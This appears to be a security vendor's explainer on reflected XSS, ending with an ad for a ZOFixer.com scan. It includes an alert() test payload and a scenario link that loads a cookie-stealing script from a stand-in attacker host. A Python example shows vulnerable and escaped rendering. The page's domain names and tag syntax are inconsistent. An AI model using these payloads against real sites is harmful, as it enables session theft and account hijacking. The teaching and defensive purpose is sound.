Reflected attacks occur when the injected script is reflected off the web server, for example in an error message, search result, or any other response that includes some or all of the input the server received as part of the request. Reflected attacks are delivered to victims through another channel, such as an e-mail message or a different website. When a user is duped into clicking a malicious link, submitting a specially crafted form, or simply browsing to a malicious site, the injected code travels to the vulnerable website, which reflects the attack back to the user’s browser. Because the code arrived from a “trusted” server, the browser executes it. Non-Persistent or Type-II XSS is another name for Reflected XSS.
While visiting a forum site that requires users to log in to their account, a perpetrator submits the search query <script type='text/javascript'>alert('xss');</script>, causing the following to occur:
- The query generates an alert box that says: “XSS”.
- The page displays: “<script type='text/javascript'>alert('XSS');</script> not found.”
- The page’s URL reads http://ecommerce.com?q=<script type="text/javascript">alert('XSS');</script>.
This tells the attacker that the website is vulnerable. He then generates his own URL, which reads http://forum.com?q=news<\script%20src="http://hackersite.com/authstealer.js", and inserts it as a link into an apparently innocuous e-mail that he sends to a group of forum participants.
While the sender address and subject line may look suspicious to some recipients, that does not stop the link from being clicked.
In fact, even if just one out of every 1,000 e-mail recipients clicks the link, that still amounts to a few dozen compromised forum participants. They are sent to the forum’s website, where the malicious script is reflected back to their browser, allowing the attacker to steal their session cookies and hijack their forum accounts.
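The mechanism above, as an added example that is not part of the original page: a minimal Python model of the forum’s “not found” search response, first reflecting the raw query (vulnerable) and then output-encoding it (hardened), plus the reflection check a scanner performs and the cookie flag that blunts the session theft described. The URL, domain and cookie name are constructed placeholders.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request, URL-encoded the way a browser would send the page's payload.
# Decoded, ?q= is: <script>alert('XSS');</script>
SAMPLE_URL = "http://forum.example/?q=%3Cscript%3Ealert(%27XSS%27)%3B%3C/script%3E"

def query_param(url: str) -> str:
    """Return the decoded value of ?q= exactly as the server-side handler sees it."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]

def render_not_found_vulnerable(term: str) -> str:
    # Reflects the search term into HTML without encoding: any markup in the term
    # becomes part of the page and is executed by the victim's browser.
    return f"<p>{term} not found.</p>"

def render_not_found_safe(term: str) -> str:
    # Contextual output encoding: <, >, &, and quotes become entities, so the term
    # is shown as text and can no longer open a <script> element.
    return f"<p>{html.escape(term, quote=True)} not found.</p>"

def reflects_markup(response_body: str, supplied: str) -> bool:
    """Detection heuristic used by scanners: the supplied input contains a tag
    and appears verbatim in the response body."""
    return "<" in supplied and supplied in response_body

def session_cookie_header(value: str) -> str:
    # Defence in depth against the cookie theft in the scenario: HttpOnly keeps the
    # session cookie out of document.cookie, so an injected script cannot read it;
    # Secure and SameSite limit where the browser will send it.
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"

if __name__ == "__main__":
    term = query_param(SAMPLE_URL)
    for label, page in (("vulnerable", render_not_found_vulnerable(term)),
                        ("hardened", render_not_found_safe(term))):
        print(f"{label}: reflected={reflects_markup(page, term)}\n  {page}")
    print(session_cookie_header("placeholder-session-id"))
```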
The ZOFixer.com security scan helps find this vulnerability in your software and server; you can use it by registering on our website and activating the 30-day trial.